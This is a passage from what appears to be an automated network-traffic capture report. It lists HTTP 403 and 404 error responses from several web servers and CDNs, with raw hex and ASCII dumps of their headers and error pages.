friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:16 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u6FGKDP4izi3qQQhOVjgMyTbuMRXo7QDoR8nhFp8HsYvxf7MsRJQ3haPyZ2f0ND6xMenrmlEfIK6F9udQr08USD4JN%2BVi0abpzYdYqNEKVmMVWtgkaE%2Fa7ZN115T2pPu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a650c3c2c00-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:16 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eJKTW%2BtuPnibybehftKCi5dGAoqcDDAKqHnhEsf7nEavnhxury%2BOgE43WzS%2FZ1qlo21hP4B9yQVVVlRF%2BNGUR1sB198uny%2FD0lWk8WY8JTGzNlWJifb1i0K6zKDdNAFw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a659d752c00-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 31 May 2023 12:52:32 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=D4LZ6NmNQbWKv3rKAR2n2x8zrXKi94BlPwq%2F3Wk3jcK2GijhHYxQQIcuSxoqvjpoSUcZ7aOGAU0jQBHh2i37NriCpdFi3GqF1hBpjHIu8WyKA57vsTgiHx0pvTLN4A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 7cff5a664a391cb9-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 61 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 Data Ascii: 11a0<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible"
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:17 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMd3kzTVEeNf/iB9j3c1cpqs,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=X-Wix-Request-Id: 1685537537.138266404731017230X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:52:17 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 31 May 2023 12:52:17 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:17 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:17 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: direct (starting new WAN connection)Pragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FR8Dpsh8ykSqcAlEGdZxlZs%2FYkFhWM%2Bl7fKdYkek7WjBBmAjLKAllQLrYfCvIbORSeGcMsfl2fDXoD12PuTr4keu461%2Bhte2fGviOt0i8ce8rPIi0RcgRHBU%2B4op18tERtE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a717c0f9b9a-FRAalt-svc: h3=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-size:150px; line-height:1
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:52:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=15X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: a0e544a6-47b3-4aff-80e9-0884df15235bCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0vW9qJ2ZZrM6C5ienKLSP9HyNSEMLH%2B7CyjoyVxz%2F8gWzD6IicL%2B%2BzK%2BEFfjwH%2Ft1IJM%2BygY2kY5qqdGoK24bP5kyG06ATMl25RdMw3DKYwCa%2B7WTwXw5fg1%2By7SJAM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=134.000063Server: cloudflareCF-RAY: 7cff5a73197003cd-FRAalt-svc: h3=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:19 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=60LR%2BypY39FPP1OSD2fIXg0iiwfODYwYeNz5cs3To3e%2B3%2BFH5A3bwqMqvU2k5iOwq%2BVWoAgttjRjaqQxzw%2Fwpe4AS5mBrBAYA6tmVk0hF4Gc2izyZrr1bSDlkXz6QAw6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a753c10695e-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:19 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EpDCa%2BMcKBL8UpLaCQXzwuLxPXUPJZ3ON%2BVdYAMXqLoXMUZBcGUYu81eQIYvRqGAHm4XNaomhps3P8J%2FLHvTCRwzLSproOZqiAigshRmGujLsOIAAmU9tVrkIOb%2Basf%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a757c51695e-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Server: ZENEDGEX-Zen-Fury: a1a688e9d9f9c0ebc2512710646fe3bf82f1a97cDate: Wed, 31 May 2023 12:52:19 GMTX-Cache-Status: Data Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 32 37 35 31 22 2c 20 31 36 38 35 35 33 37 35 33 39 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 